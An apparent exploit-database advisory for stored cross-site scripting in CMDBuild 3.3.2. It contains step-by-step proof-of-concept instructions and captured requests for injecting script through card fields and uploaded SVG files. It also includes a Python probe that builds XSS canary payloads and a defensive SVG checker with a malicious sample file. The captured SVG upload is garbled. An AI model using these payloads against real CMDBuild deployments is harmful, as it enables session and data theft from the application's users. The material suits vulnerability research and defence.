Published on November 16th, 2021
CMDBuild 3.3.2 Cross Site Scripting – Torchsec
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux
Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML, either through the text fields of a new card or through a crafted SVG document uploaded as an attachment. The attack vectors include Add Attachment, Add Office, and Add Employee (almost all "Add" sections).
Proof of concept:
Stored XSS example:
1- Log in to your dashboard as a low-privilege user
2- Click on Basic archives, then Employee
3- Click "+ Add card" (Employee)
4- Enter your XSS payload in the card fields
5- On the added employee, click "Open Relation Graph"
POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close
{"_type":"Employee","_tenant":"","Code":"">","Description":null,"Surname":"">","Name":"">","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}
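The card-creation request above, reproduced as a small probe. This is an added example and is not code from the advisory or from CMDBuild: the endpoint path and the field names are taken from the request shown, while the canary format and the classification rules for how a later response reflects it are this example's own assumptions. The useful distinction it draws is that the REST reply echoing the value back inside a JSON string only proves storage; exploitability is decided by the HTML views that render the field (the relation graph in step 5).

```python
"""Added example, not code from the advisory or from CMDBuild: build the
Employee card body from the request above with a tagged XSS canary in every
free-text field, then classify how a later response reflects that canary."""
import html
import json
import secrets

CARDS_PATH = "/cmdbuild/services/rest/v3/classes/{cls}/cards"  # path from the advisory

# Free-text fields of the Employee card body shown in the advisory; the
# remaining fields are lookups and stay null, as in the captured request.
TEXT_FIELDS = ("Code", "Description", "Surname", "Name", "Email", "Phone", "Mobile", "Fax")
LOOKUP_FIELDS = ("Type", "Qualification", "Level", "Office", "State")


def make_canary(token: str = "") -> str:
    """A standard attribute-breakout probe (assumed form, not the advisory's
    payload); the random token ties a reflection seen later to this request."""
    token = token or secrets.token_hex(4)
    return f'"><svg/onload=alert("{token}")>'


def build_card_body(class_name: str, canary: str) -> dict:
    """Same shape as the JSON body in the captured POST, canary in every text field."""
    body = {"_type": class_name, "_tenant": ""}
    body.update({f: canary for f in TEXT_FIELDS})
    body.update({f: None for f in LOOKUP_FIELDS})
    return body


def reflection(response_text: str, canary: str) -> str:
    """Classify a response body fetched after the card was created:
    'raw'     -> canary appears verbatim in an HTML body: exploitable
    'json'    -> stored verbatim but seen through JSON string escaping
                 (quotes backslashed, angle brackets intact): not XSS by
                 itself, so check the HTML views that render the field
    'escaped' -> HTML-entity encoded: safe in a text or attribute context
    'absent'  -> not reflected at all"""
    if canary in response_text:
        return "raw"
    if json.dumps(canary)[1:-1] in response_text:
        return "json"
    if (html.escape(canary, quote=True) in response_text
            or html.escape(canary, quote=False) in response_text):
        return "escaped"
    return "absent"


if __name__ == "__main__":
    canary = make_canary()
    print("POST", CARDS_PATH.format(cls="Employee"))
    print(json.dumps(build_card_body("Employee", canary)))
```

Send the printed body with the same Cmdbuild-* and X-Requested-With headers as the captured request, then run `reflection()` over the relation-graph page rather than over the REST reply; a "json" result on the reply and "raw" on the page is exactly the stored XSS the advisory describes.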
------------------------------------------------------------------------
File upload XSS example:
1- Click on Basic archives
2- Click on Workplace, then "+ Add card" (Workplace)
3- Select the "attachments" icon, then "+ Add attachment" and choose the image
4- Upload your SVG file containing the XSS payload
5- Click on preview, then right-click and open it in a new tab
Request:
POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open
-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
width="300"612px" height="400"502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
xml:space="preserve">
Gloss
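The upload vector above, from the defender's side. This is an added example and is not code from the advisory or from CMDBuild: it inspects an uploaded SVG for the kinds of active content that make the preview in step 5 fire, and builds the response headers that keep a stored SVG from executing even when the check is skipped. The two sample SVGs are constructed here (the malicious one reuses the width, height and viewBox from the captured upload), and the hardening headers go beyond what the advisory itself covers.

```python
"""Added example, not code from the advisory or from CMDBuild: inspect an
uploaded SVG for active content before it is stored, and build the response
headers that keep a stored SVG from executing when a user opens the preview
in a new tab."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: width/height/viewBox from the advisory's upload, plus the
# three kinds of active content this check looks for.
MALICIOUS_SVG = b'''<?xml version="1.0" encoding="utf-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="612px" height="502.174px" viewBox="0 65.326 612 502.174" onload="alert(1)">
  <script>alert(document.domain)</script>
  <a xlink:href="javascript:alert(2)"><text y="20">Gloss</text></a>
</svg>'''
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'

ACTIVE_ELEMENTS = {"script": "<script> element",
                   "foreignObject": "<foreignObject> element (embeds HTML)"}


def svg_findings(svg_bytes: bytes) -> list:
    """Return the reasons to reject the file; an empty list means none found.
    This is a reject-or-accept check, not a sanitizer: do not try to strip
    the offending parts and keep the rest."""
    # Entity declarations turn the parser itself into a target (XXE, entity
    # expansion), so refuse them before parsing anything.
    if b"<!ENTITY" in svg_bytes:
        return ["entity declaration in DOCTYPE"]
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]                # drop the namespace prefix
        if tag in ACTIVE_ELEMENTS:
            findings.append(ACTIVE_ELEMENTS[tag])
        for name, value in el.attrib.items():
            local = name.split("}")[-1].lower()    # xlink:href -> href
            if local.startswith("on"):             # onload, onclick, ...
                findings.append(f"{local} handler on <{tag}>")
            elif local == "href":
                v = value.strip().lower()
                # data:image/... is how legitimate SVGs embed raster images;
                # any other data: URL or a script scheme is active content.
                if (v.startswith(("javascript:", "vbscript:"))
                        or (v.startswith("data:") and not v.startswith("data:image/"))):
                    findings.append(f"{v.split(':', 1)[0]}: URL on <{tag}>")
    return findings


def attachment_headers(filename: str, content_type: str) -> dict:
    """Headers for serving a stored attachment. An SVG rendered through <img>
    never runs script; the advisory's trigger is opening the preview as a
    top-level document. 'attachment' removes that path for SVG, and the CSP
    disarms the script if the file is ever rendered directly anyway."""
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename)
    disposition = "attachment" if content_type == "image/svg+xml" else "inline"
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "Content-Disposition": f'{disposition}; filename="{safe_name}"',
    }


if __name__ == "__main__":
    print(svg_findings(MALICIOUS_SVG))
    print(svg_findings(BENIGN_SVG))
    print(attachment_headers("kiwi.svg", "image/svg+xml"))
```

The check deliberately stops at the first entity declaration instead of parsing: the stdlib parser is not a safe place to find out what a DOCTYPE does. The headers are the part worth keeping even if uploads are inspected, since a later file type or a bypass of the inspection still ends up served with them.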